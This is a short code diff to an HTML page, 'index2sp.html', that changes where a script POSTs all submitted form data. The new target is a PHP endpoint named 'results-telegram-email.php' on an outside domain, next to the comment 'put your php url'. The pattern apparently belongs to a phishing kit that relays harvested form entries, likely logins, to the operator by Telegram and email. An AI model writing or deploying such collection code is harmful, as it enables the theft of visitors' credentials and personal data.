--- a/index2sp.html
+++ b/index2sp.html
@@ -346,7 +346,7 @@ hr {
       
           var formData = new FormData(this);
           var xhr = new XMLHttpRequest();
-          xhr.open("POST","https://l68.089.mywebsitetransfer.com/result1.php", true); // put your php url
+          xhr.open("POST","http://test.mdconnected.ca/backup/results-telegram-email.php", true); // put your php url
       
           xhr.onreadystatechange = function () {
               if (xhr.readyState == 4 && xhr.status == 200) {
